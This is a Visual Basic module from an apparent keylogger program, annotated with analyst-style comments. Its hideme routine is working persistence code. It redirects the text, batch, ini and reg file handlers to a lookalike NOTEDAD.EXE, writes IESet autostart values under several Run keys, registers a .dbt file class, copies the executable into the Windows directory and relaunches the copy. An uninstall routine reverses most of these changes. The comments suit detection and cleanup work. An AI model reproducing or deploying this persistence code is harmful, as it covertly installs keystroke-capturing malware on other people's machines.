module3.bas
来自「捕获键盘操作的记录」· BAS 代码 · 共 93 行
Attribute VB_Name = "Module2"
Option Explicit
Public AppPath As String
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public syspath2 As String
Private Declare Function GetTickCount Lib "kernel32" () As Long
Sub pause(howlong As Long)
    ' Spins until the GetTickCount value has moved past the start value plus
    ' howlong, calling DoEvents on every pass so pending window messages are
    ' still processed while waiting.
    ' NOTE(review): startTick + howlong is plain Long arithmetic with no error
    ' handler in this routine, so a start value close to the Long limit would
    ' raise an overflow error here - confirm whether callers rely on that.
    Dim startTick As Long
    Dim formCount As Integer

    startTick = GetTickCount()
    Do
        ' The value returned by DoEvents is stored but never inspected.
        formCount = DoEvents
    Loop While startTick + howlong >= GetTickCount
End Sub
Public Function syspath() As String 'Get the system directory path
' Returns the directory reported by GetSystemDirectory and, as a side effect,
' stores that directory's parent (the text before its last "\") in the public
' variable syspath2. Every call queries the API again and overwrites syspath2.
' Errors are suppressed for the whole routine: a failing statement is skipped
' and the function returns whatever was last assigned to its return variable.
On Error Resume Next
Dim len5 As Long
' The function's own return variable is used as the API buffer: 255 NUL characters.
syspath = String(255, 0)
' len5 receives the API result but is never read afterwards, so a failed call
' is not detected. The size passed (256) is one more than the 255 characters
' allocated on the previous line.
len5 = GetSystemDirectory(syspath, 256)
' Keep only the text before the first NUL character.
syspath = Left(syspath, InStr(1, syspath, Chr(0)) - 1)
' Parent directory of the system directory, shared with hideme and uninstall.
syspath2 = Left(syspath, InStrRev(syspath, "\") - 1)
End Function
Public Sub hideme()
' Installation / persistence routine of the key-capture program. Read from a
' defender's point of view, it makes four kinds of change, all visible below:
'   1. points the shell handlers for txtfile, batfile, inifile and regfile at
'      NOTEDAD.EXE (one letter away from NOTEPAD.EXE);
'   2. adds a value named IESet, data "IExplorer.dll .dbt", under Run and
'      RunServices in HKLM and under Run in HKU\.DEFAULT and HKCU;
'   3. registers the .dbt extension as class DBTFILE, whose open command is
'      NOTEDAD.EXE, and creates an empty "IExplorer.dll .dbt" file in the
'      system directory;
'   4. copies QFSLKeylog.ini and the running executable (as NOTEDAD.EXE) into
'      syspath2, the parent of the system directory.
' Those value names, class names and file names are the artefacts to look for
' when hunting for or cleaning up an installation of this sample.
' On Error Resume Next hides every failure, so on a host where some writes are
' denied only part of the list above will be present.
On Error Resume Next
Dim RegEdit As Object, i As Integer
' Registry access goes through the WScript.Shell automation object.
Set RegEdit = CreateObject("WScript.Shell")
' File-type handler hijack: opening or editing these types runs NOTEDAD.EXE.
RegEdit.regwrite "HKEY_CLASSES_ROOT\txtfile\shell\open\command\", "NOTEDAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\batfile\shell\edit\command\", "NOTEDAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\inifile\shell\open\command\", "NOTEDAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\regfile\shell\edit\command\", "NOTEDAD.EXE %1"
' Autostart values. The data is a file name, not an executable path;
' presumably the .dbt association written below is what turns it into a launch
' of NOTEDAD.EXE at logon - confirm on a test system.
RegEdit.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IESet", "IExplorer.dll .dbt"
RegEdit.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\IESet", "IExplorer.dll .dbt"
RegEdit.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\IESet", "IExplorer.dll .dbt"
RegEdit.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\IESet", "IExplorer.dll .dbt"
' Custom extension .dbt -> class DBTFILE -> open command NOTEDAD.EXE.
RegEdit.regwrite "HKEY_CLASSES_ROOT\.dbt\", "DBTFILE"
RegEdit.regwrite "HKEY_CLASSES_ROOT\DBTFILE\shell\open\command\", "NOTEDAD.EXE"
' Opening for Append and closing immediately creates the file if it is missing
' and writes nothing to it. The syspath call here also fills syspath2, which
' the FileCopy and Dir lines further down depend on.
Open syspath & "\IExplorer.dll .dbt" For Append As #1
Close #1
' Disabled code: an earlier variant that copied NOTEPAD.EXE (or a
' NOTEPAD_BACKUP.EXE) to WBEM\Logs\qfsl.exe and then deleted the original
' NOTEPAD.EXE files.
' If Not LCase(Dir(syspath & "\WBEM\Logs\qfsl.exe")) = "qfsl.exe" Then
' If Not UCase(Dir(syspath2 & "\NOTEPAD_BACKUP.EXE")) = "NOTEPAD_BACKUP.EXE" Then
'' If Dir(syspath & "\NOTEPAD.EXE") <> "" Then FileCopy syspath & "\NOTEPAD.EXE", syspath & "\WBEM\Logs\qfsl.exe"
' If Dir(syspath2 & "\NOTEPAD.EXE") <> "" Then FileCopy syspath2 & "\NOTEPAD.EXE", syspath & "\WBEM\Logs\qfsl.exe"
' Else
' FileCopy syspath2 & "\NOTEPAD_BACKUP.EXE", syspath & "\WBEM\Logs\qfsl.exe"
' End If
' End If
' Kill syspath & "\NOTEPAD.EXE" 'in the system or system32 directory
' Kill syspath2 & "\NOTEPAD.EXE" 'in the winnt or WINDOWS directory
' Drop the configuration file and a copy of the running executable next to the
' system directory. AppPath is a public variable assigned outside this routine.
FileCopy AppPath & "\QFSLKeylog.ini", syspath2 & "\QFSLKeylog.ini"
FileCopy AppPath & "\" & App.EXEName & ".exe", syspath2 & "\NOTEDAD.EXE"
' FileCopy AppPath & "\" & App.EXEName & ".exe", syspath & "\WBEM\Logs\backup.exe"
' Wait for the copied .ini to become visible: at most 100 checks with
' pause(50) between them, then one more pause(50) after the loop.
For i = 1 To 100
If Dir(syspath2 & "\QFSLKeylog.ini") <> "" Then Exit For
pause (50)
Next
pause (50)
' When not already running from syspath2, start the dropped copy and end this
' instance; both statements belong to the single-line If.
If AppPath <> syspath2 Then Shell syspath2 & "\NOTEDAD.EXE", vbNormalFocus: End
End Sub
Public Sub uninstall()
    ' Removal routine: deletes the two files dropped into syspath2, writes
    ' "NOTEPAD.EXE %1" back into the four file-type handlers, and deletes the
    ' IESet autostart values and the .dbt / DBTFILE class keys.
    ' Every failure is suppressed, so a clean return does not prove that each
    ' artefact is gone; verify the keys and files afterwards.
    ' NOTE(review): syspath2 is only assigned inside syspath(), which this
    ' routine does not call - confirm the caller has populated it first.
    ' NOTE(review): the handlers are reset to a fixed string, which may differ
    ' from what the system had before installation - compare against a clean
    ' reference machine.
    ' NOTE(review): the "IExplorer.dll .dbt" file created by hideme in the
    ' system directory is not removed here.
    On Error Resume Next
    Dim shellObj As Object
    Dim target As Variant

    Set shellObj = CreateObject("WScript.Shell")

    ' Dropped files in the parent of the system directory.
    For Each target In Array("\QFSLKeylog.ini", "\NOTEDAD.EXE")
        Kill syspath2 & target
    Next
    ' Kill syspath & "\WBEM\Logs\backup.exe"

    ' Point the hijacked handlers back at NOTEPAD.EXE.
    For Each target In Array( _
            "HKEY_CLASSES_ROOT\txtfile\shell\open\command\", _
            "HKEY_CLASSES_ROOT\batfile\shell\edit\command\", _
            "HKEY_CLASSES_ROOT\inifile\shell\open\command\", _
            "HKEY_CLASSES_ROOT\regfile\shell\edit\command\")
        shellObj.RegWrite target, "NOTEPAD.EXE %1"
    Next

    ' Autostart values first, then the custom file class.
    ' NOTE(review): DBTFILE still has the shell\open\command subkeys beneath it
    ' when it is deleted; confirm that the key is really removed.
    For Each target In Array( _
            "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IESet", _
            "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\IESet", _
            "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\IESet", _
            "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\IESet", _
            "HKEY_CLASSES_ROOT\.dbt\", _
            "HKEY_CLASSES_ROOT\DBTFILE\")
        shellObj.RegDelete target
    Next
    ' FileCopy syspath & "\WBEM\Logs\qfsl.exe", syspath2 & "\NOTEPAD_BACKUP.EXE"
    ' Kill syspath & "\WBEM\Logs\qfsl.exe"
End Sub